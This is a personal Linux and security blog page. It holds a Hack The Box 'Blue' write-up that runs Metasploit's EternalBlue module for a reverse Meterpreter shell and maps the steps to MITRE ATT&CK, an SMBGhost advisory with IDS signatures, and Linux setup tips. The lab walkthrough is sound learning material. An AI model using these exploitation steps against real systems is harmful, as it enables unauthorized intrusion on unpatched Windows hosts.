Hack The Box Write-up: BLUE

Posted on November 29, 2023 by Ahmed Tawfik


This article is a writeup of how the HTB machine “Blue” was pawned and its root flag captured and eventually model this path using the MITRE ATT&CK Framework.

Recon

Introduction

The reconnaissance phase, often referred to as the “recon phase,” is a crucial initial step in the process of hacking a machine on Hack The Box (HTB). This phase involves gathering as much information as possible about the target system, which can include identifying the operating system, open ports, running services, software versions, and potential vulnerabilities. The goal of this phase is to construct a detailed profile of the target, which can be used to plan further attack strategies.

In the context of hacking a machine on HTB, where the environment is designed for testing and learning, it’s appropriate to choose active scanning methods as outlined in the MITRE ATT&CK framework. Active scanning involves directly interacting with the target system to gather information. This approach is suitable in a controlled environment like HTB, where the primary goal is to learn and practice hacking skills without the need for stealth.

Phase I

In the first phase of the hacking process on a HTB machine, we utilized nmap with the arguments -sC and -sV targeting the IP address 10.129.55.2. This approach is highly effective for initial reconnaissance, as it provides a wealth of information about the target system.

Key findings from this scan included:

  • Open Ports: It was discovered that ports 445 and 139 are open. These ports are typically associated with the SAMBA service, which is used for file sharing in Windows and Linux systems. The openness of these ports suggests that the SAMBA service is active and accessible on the target machine.
  • OS Detection: The scan identified the operating system of the target machine as Windows 7 Service Pack 1. Given that this is an outdated version of Windows, it potentially harbors unpatched vulnerabilities and security weaknesses.

Phase II

Once it was established that SAMBA was running on the target machine, as indicated by the open ports 445 and 139, the next logical step in the hacking process was to conduct a more focused vulnerability scan specifically for SAMBA-related weaknesses. For this purpose, Nmap was employed again, this time using the argument –script smb-vuln*. This command triggers a series of nmap scripts designed to detect common vulnerabilities in SAMBA.

The result of this targeted scan revealed a critical finding: the target is vulnerable to MS17-010, also known as EternalBlue. This vulnerability is particularly notable for several reasons, among them:

  • Severity: EternalBlue is a high-severity vulnerability, with a CVSS score of 9.3. It allows for remote code execution. It was infamously exploited in the WannaCry ransomware attacks.
  • Exploitability: The presence of this vulnerability opens up a clear path for exploiting the target machine. Tools and exploits designed to leverage EternalBlue are widely available and well-documented in the cybersecurity community, such as the Metasploit Framework.

This discovery is a key milestone in the hacking process, as it provides a direct and potentially straightforward method to exploit the target system, aligning with the overall objective of gaining unauthorized access to the machine on the HTB platform.

Attack

Upon discovering that the target machine was vulnerable to MS17-010 (EternalBlue), the next step was to exploit this vulnerability using the Metasploit Framework.
The process involved the following steps:

  • Searching for MS17-010 Exploit: Within Metasploit, the command search ms17-010 was used. This command searches the Metasploit database for any exploits related to the MS17-010 vulnerability.
  • Identifying the Appropriate Exploit: The search results revealed the /exploit/windows/smb/ms17_010_eternalblue module. This module is specifically designed to exploit the EternalBlue vulnerability in Windows, via RCE using a reverse shell
    • Setting Up the Exploit: After selecting the appropriate exploit, it was configured with the necessary options
      • RHOSTS: Setting the target’s IP address to 10.129.55.2
      • LHOST: Setting it to the attacker machine’s IP address 10.10.14.17 for the reverse shell on the target to connect to it
      • Payload: Meterpreter Reverse TCP Shell (by default)
  • Executing the Exploit: The exploit was executed against the target machine. A Meterpreter TCP reverse shell was opened successfully.
  • Checking Permissions: The command getuid was used to determine our privileges, we had the highest level of privileges on a Windows OS: System

Flag Capture

Once inside the system, the next task was to navigate to the directory where the root flag is typically stored. In this scenario, the command used was to change the directory to the Administrator’s desktop: cd C:\Users\Administrator\Desktop


To view the contents of the root flag file, cat root.txt was used. This command displays the contents of the file, revealing the root flag.

MITRE ATT&CK Framework Modelling

Modelling using the MITRE ATT&CK framework provides a structured approach to understanding and categorizing the techniques used in the hacking process. The MITRE ATT&CK framework is a comprehensive matrix of tactics and techniques used by threat actors in real-world cyber attacks. In the context of HTB BLUE machine, here’s how the steps used align with the framework:

  • Reconnaissance (Tactic ID: TA0043):
    • Vulnerability Scanning (Technique ID: T1595): Scanning the target machine with Nmap for open ports and services, and using specific scripts to identify SAMBA vulnerabilities.
  • Resource Development (Tactic ID: TA0042):
    • Acquire Infrastructure (Technique ID: T1583): Setting up and preparing Metasploit Framework for exploitation.
  • Initial Access (Tactic ID: TA0001):
    • Exploit Public-Facing Application (Technique ID: T1190): Utilizing the Metasploit Framework to exploit the identified EternalBlue vulnerability (MS17-010).
  • Execution (Tactic ID: TA0002):
    • Exploitation for Client Execution (Technique ID: T1203): Executing the EternalBlue exploit to gain unauthorized access and executing code on the target system.
  • Privilege Escalation (Tactic ID: TA0004):
    • Exploitation for Privilege Escalation (Technique ID: T1068): Gaining elevated privileges through the exploit, resulting in administrative or root access.
  • Discovery (Tactic ID: TA0007):
    • File and Directory Discovery (Technique ID: T1083): Navigating the file system to locate the root.txt file.
  • Collection (Tactic ID: TA0009):
    • Data from Local System (Technique ID: T1005): Accessing and retrieving the root flag from the root.txt file.

That’s it, Enjoy!

Sources:

Posted in Linux | Leave a comment

How to install multiple CUDA versions on a single Linux server

Posted on November 20, 2023 by Ahmed Tawfik

After you installed the first CUDA toolkit (preferably the latest stable version), and you want to install others beside it, due to some compatibililty issues for example, just do the following:

Download the standalone file installer, e.g. https://developer.download.nvidia.com/compute/cuda/11.7.0/local_installers/cuda_11.7.0_515.43.04_linux.run

chmod +x file_name
sudo ./file_name

When prompted for the components, you MUST deselect the driver, better just keep the CUDA toolkit and deselect all others

When prompted to update the /usr/local/cuda symlink, DON’T accept

After installation is done, just run the following and you are good to go:

export PATH=/usr/local/cuda-11.7/bin:$PATH
export LD_LIBRARY_PATH=/usr/local/cuda-11.7/lib64:$LD_LIBRARY_PATH

Tested and working properly on Ubuntu 22.04 with A100 GPUs

Enjoy!

Source: https://medium.com/@peterjussi/multicuda-multiple-versions-of-cuda-on-one-machine-4b6ccda6faae

Posted in Linux | Tagged , , , | Leave a comment

CVE-2020-0796 – SMBGhost RCE Vulnerability

Posted on October 20, 2023 by Ahmed Tawfik

Description and Impact

Also known as CoronaBlue, EternalDarkness and SMBleedingGhost, this critical buffer-overflow pre-authentication RCE vulnerability affects Microsoft SMB version 3.1.1 that have SMBv3 Compression enabled. It occurs when the server attempts to decompress a data packet with malformed header, causing a memory buffer overflow. That overflow can cause memory corruption, crashing the kernel and allowing an attacker to execute arbitrary code.

This vulnerability can affect both servers and clients. To affect a server, the attacker could send a compressed data packet with the malformed header to that server. To exploit it against a client, a malicious SMBv3 server must be created by the attacker and trick a user into connecting to it.

The following products and versions are affected:

ProductVersion
Windows Server1903
Windows Server1909
Windows 101903 for x86-32bit, x86-64bit, ARM-64bit Systems
Windows 101909 for x86-32bit, x86-64bit, ARM-64bit Systems

Lifecycle and Trend

This vulnerability was disclosed on March 10th, 2020 accidentally in a security vendor’s blog for March’s Microsoft Patch Tuesday. The accidental disclosure of the vulnerability identified it as CVE-2020-0796. This was confirmed by Microsoft on March 12th, 2020, and released an out-of-band patch.

With the beginning of March, Keysight’s honeypots detected a sudden increase in SMB related activity with 63,322 scans on 13th of March.

Multiple POCs were released after Microsoft published the security advisory.

Programming Flaw

There are two main flaws leading to this vulnerability:

  • Improper Input Validation: When the server receives a compressed data packet, it doesn’t add a check for the size of uncompressed data before starting the decompression. This check should be added, and if the size is too large, then reject the packet.
  • Missing Memory Allocation Checks: Before writing decompressed data to the buffer, the process doesn’t ensure that the buffer has adequate space. This check should be added to make sure of that. Depending on the result, it should decide whether to accept or reject the packet.

Exploitation Methodology

This vulnerability can be exploited through the integer overflow bug in the Srv2DecompressData function in the Srv2.sys file. This vulnerability can be triggered when the SMB server receives a malformed SMB2_Compression_Transform_Header. After that, the Srv2DecompressData function creates a buffer to hold the decompressed data. The function computes the buffer size by adding the “OriginalSize” to the “Offset”. After the buffer size has been calculated, it passes the size to the SrvNetAllocateBuffer function to allocate the buffer. The overflow caused the kernel to allocate a buffer that was much smaller than it should be. This caused memory corruption and can crash the kernel.

An exploit has been developed on Metasploit: exploit/windows/smb/cve_2020_0796_smbghost

Log Traces

The following network logs should indicate attempts to exploit this vulnerability:

  • Spikes in SMB Traffic
  • Specific packet patterns with compression flag set and an anomalous size value

IDS Detection

Fortinet

Signature ID : 48773 MS.SMB.Server.Compression.Transform.Header.Memory.Corruption

Cisco Snort

1:53427 <-> ENABLED <-> OS-WINDOWS Microsoft Windows SMB srv2.sys remote code execution attempt (os-windows.rules)
1:53428 <-> ENABLED <-> OS-WINDOWS Microsoft Windows SMB srv2.sys remote code execution attempt (os-windows.rules)
1:53426 <-> ENABLED <-> OS-WINDOWS Microsoft Windows SMB srv2.sys remote code execution attempt (os-windows.rules)
1:53425 <-> ENABLED <-> OS-WINDOWS Microsoft Windows SMB srv2.sys remote code execution attempt (os-windows.rules)

McAfee IPS

Attack Name: NETBIOS-SS: Samba Remote Code Execution Vulnerability (CVE-2020-0796)
Attack ID: 0x43c0e600

References

Posted in Linux | Leave a comment

How to configure TP-LINK TL-WN722N v1.1 WiFi Adapter for Kali Linux

Posted on October 18, 2023 by Ahmed Tawfik

This WiFi card (which works mainly for monitoring mode) was not getting detected by Kali (2023.2 as of now) and I had to just install an extra package to get it working properly:

sudo apt update
sudo apt install firmware-atheros

Unplug and plug it again, and voila!

Enjoy!

Sources:

https://unix.stackexchange.com/questions/326462/how-do-i-install-atheros-ar9271-wifi-drivers-on-debian

Posted in Linux | Tagged , , | Leave a comment

Kali Desktop in a VM: Have a better desktop experience

Posted on October 14, 2023 by Ahmed Tawfik

Well, this issue has been bothering me for a while. If you have Kali Linux Desktop on a Virtual Machine (VMware Workstation or VirtualBox for example), and you have a low-resolution screen, you won’t feel that much, however, if you have a 2K+ screen, you will see these tiny icons and text:

Some would say just use the hidpi mode, but it becomes too big! The best solution I found so far is to install the gnome-desktop. Note: Before you do that, you might need to change the line in “/etc/apt/sources.list” that points to “kali-rolling” to” kali-last-snapshot” before running the below command, for a more stable Kali experience (Kali overall, not just the desktop):

sudo apt update && sudo apt install kali-desktop-gnome

Once prompted to select a display manager, choose gdm3.

After rebooting, login normally, open the Tweaks App (Not Kali Tweaks), go to Fonts, then modify the Scaling Factor to your preference. It will be much more convenient and comfortable for your eyes:

That’s it, Enjoy!

Posted in kali, Linux | Tagged , , , | Leave a comment